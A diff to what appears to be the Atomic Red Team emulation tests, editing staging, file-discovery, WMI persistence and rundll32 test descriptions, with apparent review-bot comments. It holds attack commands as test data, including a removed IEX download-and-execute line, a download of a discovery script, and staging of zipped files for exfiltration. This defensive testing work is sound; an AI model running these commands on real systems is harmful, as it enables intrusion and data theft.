diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md
index f1d4dfa3..013cd8d4 100644
--- a/atomics/T1074/T1074.md
+++ b/atomics/T1074/T1074.md
@@ -16,21 +16,31 @@ Interactive command shells may be used, and common functionality within [cmd](ht
## Atomic Test #1 - Stage data from Discovery.bat
-Utilize powershell to download discovery.bat and save to a local file
+Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
+verify that the file is saved in the temp directory.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP\discovery.bat|
+
#### Attack Commands: Run with `powershell`!
```powershell
-IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat') > pi.log
+Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat" -OutFile #{output_file}
```
+#### Cleanup Commands:
+```powershell
+Remove-Item -Force #{output_file} -ErrorAction Ignore
+```
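Review bot: the `#{output_file}` argument on the new `Invoke-WebRequest ... -OutFile #{output_file}` line is unquoted, so any user-supplied path containing a space (the default `$env:TEMP\discovery.bat` is safe, but a custom value may not be) will be split into separate arguments; use `-OutFile "#{output_file}"` and the same in the cleanup `Remove-Item -Force "#{output_file}" -ErrorAction Ignore`. Also worth stating in the description that this is a behaviour change, not just a rewording: the old command ran the script in memory via `IEX` and redirected its output to `pi.log` (which nothing cleaned up), whereas the new one only writes the batch file to disk and never executes it, so the staged artifact is now the tool itself rather than collected output. Minor table nit: the default-value cell `$env:TEMP\discovery.bat|` is missing the space before the closing pipe that the other cells have.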
@@ -64,24 +74,31 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp
-Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration.
+Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
+was placed in the temp directory.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| input_file | Location of file or folder to zip | Path | PathToAtomicsFolder\T1074\bin\Folder_to_zip|
+| output_file | Location to save zipped file or folder | Path | $env:TEMP\Folder_to_zip.zip|
+
#### Attack Commands: Run with `powershell`!
```powershell
-Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
+Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force
```
#### Cleanup Commands:
```powershell
-Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore
+Remove-Item -Path #{output_file} -ErrorAction Ignore
```
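Review bot: the added description text has a stray capital mid-sentence, "Upon execution, Verify that a zipped folder ..."; lower-case "verify". As with the previous test, wrap the substituted paths in quotes, `Compress-Archive -Path "#{input_file}" -DestinationPath "#{output_file}" -Force`, because `PathToAtomicsFolder` or a custom `output_file` may expand to a path with spaces. Adding `-Force` is a good change for repeatability, since without it a second run fails when `Folder_to_zip.zip` already exists.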
diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md
index 8a89d446..a7cd04eb 100644
--- a/atomics/T1083/T1083.md
+++ b/atomics/T1083/T1083.md
@@ -24,7 +24,8 @@ In Mac and Linux, this kind of discovery is accomplished with the ls
## Atomic Test #1 - File and Directory Discovery (cmd.exe)
-Find or discover files on the file system
+Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of
+all of the data discovery commands.
**Supported Platforms:** Windows
@@ -39,7 +40,6 @@ Find or discover files on the file system
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
dir /s "c:\Program Files\" >> %temp%\download
-dir /s d:\ >> %temp%\download
dir "%systemdrive%\Users\*.*" >> %temp%\download
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
dir "%userprofile%\Desktop\*.*" >> %temp%\download
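Review bot: dropping `dir /s d:\ >> %temp%\download` is sensible, since on hosts without a D: drive that line only produced an error in the output file, but the remaining commands all use `>>`, so repeated runs keep appending to `%temp%\download` and the file grows across executions. Given the new description promises that the file "will be placed in the temporary folder", consider making the first `dir` use `>` (or add a `del %temp%\download` cleanup command) so each run starts from a fresh file.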
@@ -55,7 +55,7 @@ tree /F >> %temp%\download
## Atomic Test #2 - File and Directory Discovery (PowerShell)
-Find or discover files on the file system
+Find or discover files on the file system. Upon execution, file and folder information will be displayed.
**Supported Platforms:** Windows
diff --git a/atomics/T1084/T1084.md b/atomics/T1084/T1084.md
index 6f555bf1..9d6fd383 100644
--- a/atomics/T1084/T1084.md
+++ b/atomics/T1084/T1084.md
@@ -4,15 +4,14 @@
## Atomic Tests
-- [Atomic Test #1 - Persistence](#atomic-test-1---persistence)
+- [Atomic Test #1 - Persistence via WMI Event Subscription](#atomic-test-1---persistence-via-wmi-event-subscription)
-## Atomic Test #1 - Persistence
-Run from an administrator powershell window
-
-After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
+## Atomic Test #1 - Persistence via WMI Event Subscription
+Run from an administrator powershell window. After running, reboot the victim machine.
+After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
@@ -52,7 +51,6 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
-
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
diff --git a/atomics/T1085/T1085.md b/atomics/T1085/T1085.md
index 3c495239..58bb0399 100644
--- a/atomics/T1085/T1085.md
+++ b/atomics/T1085/T1085.md
@@ -24,7 +24,7 @@ Rundll32 can also been used to execute scripts such as JavaScript. This can be d
## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject
-Test execution of a remote script using rundll32.exe
+Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
**Supported Platforms:** Windows
diff --git a/atomics/index.md b/atomics/index.md
index 18884c53..a2e4aab4 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -141,7 +141,7 @@
- [T1100 Web Shell](./T1100/T1100.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- - Atomic Test #1: Persistence [windows]
+ - Atomic Test #1: Persistence via WMI Event Subscription [windows]
- [T1004 Winlogon Helper DLL](./T1004/T1004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 56294edc..87171f76 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -5075,11 +5075,10 @@ persistence:
modified: '2019-10-15T18:43:47.703Z'
identifier: T1084
atomic_tests:
- - name: Persistence
+ - name: Persistence via WMI Event Subscription
description: |
- Run from an administrator powershell window
-
- After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
+ Run from an administrator powershell window. After running, reboot the victim machine.
+ After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
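Review bot: this diff touches only `atomics/index.yaml`, the per-technique Markdown files and the index Markdown files, which in this repository are generated from the technique YAML sources; none of the source files (for example `atomics/T1074/T1074.yaml`, `atomics/T1083/T1083.yaml`, `atomics/T1084/T1084.yaml`, `atomics/T1085/T1085.yaml`) appear in the change set. Please confirm they were updated as well, otherwise the next regeneration will revert the renamed test, the new input arguments and the description changes.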
@@ -5111,7 +5110,6 @@ persistence:
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
-
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
@@ -11663,7 +11661,8 @@ defense-evasion:
identifier: T1085
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
- description: 'Test execution of a remote script using rundll32.exe
+ description: 'Test execution of a remote script using rundll32.exe. Upon execution
+ notepad.exe will be opened.
'
supported_platforms:
@@ -17338,9 +17337,9 @@ discovery:
identifier: T1083
atomic_tests:
- name: File and Directory Discovery (cmd.exe)
- description: 'Find or discover files on the file system
-
-'
+ description: |
+ Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of
+ all of the data discovery commands.
supported_platforms:
- windows
executor:
@@ -17350,13 +17349,13 @@ discovery:
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
dir /s "c:\Program Files\" >> %temp%\download
- dir /s d:\ >> %temp%\download
dir "%systemdrive%\Users\*.*" >> %temp%\download
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
dir "%userprofile%\Desktop\*.*" >> %temp%\download
tree /F >> %temp%\download
- name: File and Directory Discovery (PowerShell)
- description: 'Find or discover files on the file system
+ description: 'Find or discover files on the file system. Upon execution, file
+ and folder information will be displayed.
'
supported_platforms:
@@ -23689,7 +23688,8 @@ execution:
identifier: T1085
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
- description: 'Test execution of a remote script using rundll32.exe
+ description: 'Test execution of a remote script using rundll32.exe. Upon execution
+ notepad.exe will be opened.
'
supported_platforms:
@@ -27306,17 +27306,24 @@ collection:
identifier: T1074
atomic_tests:
- name: Stage data from Discovery.bat
- description: 'Utilize powershell to download discovery.bat and save to a local
- file
-
-'
+ description: |
+ Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
+ verify that the file is saved in the temp directory.
supported_platforms:
- windows
+ input_arguments:
+ output_file:
+ description: Location to save downloaded discovery.bat file
+ type: Path
+ default: "$env:TEMP\\discovery.bat"
executor:
name: powershell
elevation_required: false
- command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat'')
- > pi.log
+ command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat"
+ -OutFile #{output_file}
+
+'
+ cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore
'
- name: Stage data from Discovery.sh
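Review bot: the new `command:` scalar ends with an extra blank line inside the single quotes (the `+` line between `-OutFile #{output_file}` and `'`), while the neighbouring `cleanup_command:` does not; it is harmless for PowerShell but keep the two consistent. The quoting point from the Markdown hunk applies here too: `-OutFile #{output_file}` and `Remove-Item -Force #{output_file}` should carry double quotes around the substituted path so a custom `output_file` containing spaces still works.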
@@ -27334,21 +27341,28 @@ collection:
'
- name: Zip a Folder with PowerShell for Staging in Temp
- description: 'Use living off the land tools to zip a file and stage it in the
- Windows temporary folder for later exfiltration.
-
-'
+ description: |
+ Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
+ was placed in the temp directory.
supported_platforms:
- windows
+ input_arguments:
+ input_file:
+ description: Location of file or folder to zip
+ type: Path
+ default: PathToAtomicsFolder\T1074\bin\Folder_to_zip
+ output_file:
+ description: Location to save zipped file or folder
+ type: Path
+ default: "$env:TEMP\\Folder_to_zip.zip"
executor:
name: powershell
elevation_required: false
- command: 'Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip
- -DestinationPath $env:TEMP\Folder_to_zip.zip
+ command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file}
+ -Force
'
- cleanup_command: 'Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction
- Ignore
+ cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore
'
'':
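Review bot: the `input_file` default `PathToAtomicsFolder\T1074\bin\Folder_to_zip` is an unquoted plain scalar while `output_file` uses a double-quoted, backslash-escaped `"$env:TEMP\\Folder_to_zip.zip"`; both parse to the intended strings, but pick one quoting style for path defaults across the file. The description carries the same mid-sentence capital as the Markdown version, "Upon execution, Verify that a zipped folder ...", which should read "verify".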
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 3332ebf0..2c31411d 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -339,7 +339,7 @@
- [T1100 Web Shell](./T1100/T1100.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- - Atomic Test #1: Persistence [windows]
+ - Atomic Test #1: Persistence via WMI Event Subscription [windows]
- [T1004 Winlogon Helper DLL](./T1004/T1004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]